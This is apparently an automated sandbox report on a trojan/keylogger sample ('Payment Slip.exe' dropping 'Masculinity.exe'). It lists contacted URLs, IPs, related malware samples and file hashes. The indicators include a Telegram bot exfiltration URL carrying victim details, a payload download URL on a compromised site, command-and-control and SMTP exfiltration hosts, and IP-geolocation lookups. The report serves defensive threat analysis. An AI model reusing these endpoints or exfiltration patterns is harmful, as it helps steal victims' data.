                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://reallyfreegeoip.org/xml/8.46.123.33false
                      • URL Reputation: safe
                      unknown
                      http://checkip.dyndns.org/false
                      • URL Reputation: safe
                      unknown
                      https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.binfalse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.office.com/Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabMasculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/ac/?q=Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://sectigo.com/CPS0Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.orgMasculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://chrome.google.com/webstore?hl=enlBcqMasculinity.exe, 00000007.00000002.3286769966.0000000021019000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoMasculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.sectigo.com0Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.org/botMasculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://aka.ms/pscore6lBcqpowershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.reap.skyestates.com.mt/Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://checkip.dyndns.orgMasculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://checkip.dyndns.org/8Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorPayment Slip.exe, Masculinity.exe.2.drfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20aMasculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://chrome.google.com/webstore?hl=enMasculinity.exe, 00000007.00000002.3286769966.000000002101E000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.ecosia.org/newtab/Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://varders.kozow.com:8081Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://smtp.privateemail.comMasculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://aborters.duckdns.org:8081Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://ac.ecosia.org/autocomplete?q=Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://51.38.247.67:8081/_send_.php?LMasculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://reallyfreegeoip.org/xml/8.46.123.33$Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020ED8000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://anotherarmy.dns.army:8081Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMasculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://reallyfreegeoip.orgMasculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.office.com/lBcqMasculinity.exe, 00000007.00000002.3286769966.000000002104A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://reallyfreegeoip.org/xml/Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        149.154.167.220
                        api.telegram.orgUnited Kingdom
                        62041TELEGRAMRUtrue
                        188.114.97.3
                        reallyfreegeoip.orgEuropean Union
                        13335CLOUDFLARENETUStrue
                        193.122.6.168
                        checkip.dyndns.comUnited States
                        31898ORACLE-BMC-31898USfalse
                        108.167.181.251
                        www.reap.skyestates.com.mtUnited States
                        46606UNIFIEDLAYER-AS-1USfalse
                        66.29.159.53
                        smtp.privateemail.comUnited States
                        19538ADVANTAGECOMUStrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1481491
                        Start date and time:2024-07-25 10:03:18 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 5s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Payment Slip.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@6/11@5/5
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 198
                        • Number of non-executed functions: 91
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 3372 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Payment Slip.exe
                        TimeTypeDescription
                        04:04:10API Interceptor42x Sleep call for process: powershell.exe modified
                        04:05:22API Interceptor12687x Sleep call for process: Masculinity.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        149.154.167.220Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                            Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                              Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  Install.msiGet hashmaliciousUnknownBrowse
                                    rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                      z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                        Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            188.114.97.3MB9901717-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • vlha.shop/LB341/index.php
                                            http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerrorGet hashmaliciousHTMLPhisherBrowse
                                            • kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
                                            Quotation.xlsGet hashmaliciousRemcosBrowse
                                            • tny.wtf/jk8Z5I
                                            NUEVO ORDEN01_202407238454854.pdf.exeGet hashmaliciousFormBookBrowse
                                            • www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
                                            DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                                            • tny.wtf/cyd
                                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/4jaIXkvS/download
                                            QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/PM6yPStj/download
                                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/0DmcWsUI/download
                                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/4jaIXkvS/download
                                            QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/PM6yPStj/download
                                            193.122.6.168SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            Orden de Compra..exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            Fekdjuvq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            neworder.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            ORDER INQUIRY_QTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            QvS0a5bvCMM8EUj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            SecuriteInfo.com.Trojan.AutoIt.1413.12984.723.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            SecuriteInfo.com.Trojan.MSIL.Crypt.25795.12791.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            reallyfreegeoip.orgTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.96.3
                                            Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 172.67.177.134
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            smtp.privateemail.comHSBC Payment Advice_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 66.29.159.53
                                            Payment List.bat.exeGet hashmaliciousAgentTeslaBrowse
                                            • 66.29.159.53
                                            INQUIRY RE44535_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 66.29.159.53
                                            Texas_Tool_Purchase_Order#T18834-1.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 66.29.159.53
                                            Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 66.29.159.53
                                            e-dekont_swift-details.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 66.29.159.53
                                            17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                            • 66.29.159.53
                                            Scan_IMG-Payment Sheet _Till Febuary 2024...bat.exeGet hashmaliciousAgentTeslaBrowse
                                            • 66.29.159.53
                                            1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                            • 66.29.159.53
                                            1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                            • 66.29.159.53
                                            www.reap.skyestates.com.mtConfirmation transfer AGS # 22-00379.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 108.167.181.251
                                            ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            MB9901717-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 108.167.181.251
                                            List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 108.167.181.251
                                            Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 108.167.181.251
                                            odemePlani.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            #91139_C050.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            BSX#24001602.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            api.telegram.orgTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Install.msiGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 149.154.167.220
                                            z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                            • 149.154.167.220
                                            Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 149.154.167.220
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ORACLE-BMC-31898USTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 158.101.44.242
                                            Lisect_AVT_24003_G1B_67.exeGet hashmaliciousUnknownBrowse
                                            • 158.101.28.51
                                            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 158.101.44.242
                                            counter.exeGet hashmaliciousBdaejecBrowse
                                            • 158.101.87.161
                                            rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 158.101.44.242
                                            z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 158.101.44.242
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 158.101.44.242
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            TELEGRAMRUTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                            • 149.154.167.99
                                            LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                            • 149.154.167.99
                                            LisectAVT_2403002C_67.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                            • 149.154.167.99
                                            LisectAVT_2403002C_81.exeGet hashmaliciousVidarBrowse
                                            • 149.154.167.99
                                            Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            CraxsRat VIP.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            CLOUDFLARENETUSESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 188.114.96.3
                                            MB9901717-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 188.114.97.3
                                            MGL6070111-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 188.114.96.3
                                            Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.96.3
                                            NB4EASbynx.msiGet hashmaliciousLummaCBrowse
                                            • 188.114.96.3
                                            Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            Scan file.docGet hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            LisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            LisectAVT_2403002C_16.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            nX1oQE2we8.exeGet hashmaliciousCryptOne, QbotBrowse
                                            • 104.21.34.74
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            54328bd36c14bd82ddaa0c04b25ed9adTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            Lisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                                            • 188.114.97.3
                                            Lisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                                            • 188.114.97.3
                                            Lisect_AVT_24003_G1B_127.exeGet hashmaliciousPureLog StealerBrowse
                                            • 188.114.97.3
                                            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                                            • 188.114.97.3
                                            Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            3b5074b1b5d032e5620f69f9f700ff0eTorpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 149.154.167.220
                                            LisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            LisectAVT_2403002C_16.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                                            • 149.154.167.220
                                            Lisect_AVT_24003_G1A_33.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            Lisect_AVT_24003_G1B_84.msiGet hashmaliciousAteraAgentBrowse
                                            • 149.154.167.220
                                            Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            DD Spotify Acc Gen.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                            • 149.154.167.220
                                            37f463bf4616ecd445d4a1937da06e19ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            Confirmation transfer AGS # 22-00379.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 108.167.181.251
                                            ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            MB9901717-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            MGL6070111-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 108.167.181.251
                                            Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 108.167.181.251
                                            LisectAVT_2403002C_159.exeGet hashmaliciousBdaejec, DarkSideBrowse
                                            • 108.167.181.251
                                            nX1oQE2we8.exeGet hashmaliciousCryptOne, QbotBrowse
                                            • 108.167.181.251
                                            LisectAVT_2403002C_160.exeGet hashmaliciousUpatreBrowse
                                            • 108.167.181.251
                                            Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                            • 108.167.181.251
                                            No context
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):8003
                                            Entropy (8bit):4.840877972214509
                                            Encrypted:false
                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                            MD5:106D01F562D751E62B702803895E93E0
                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
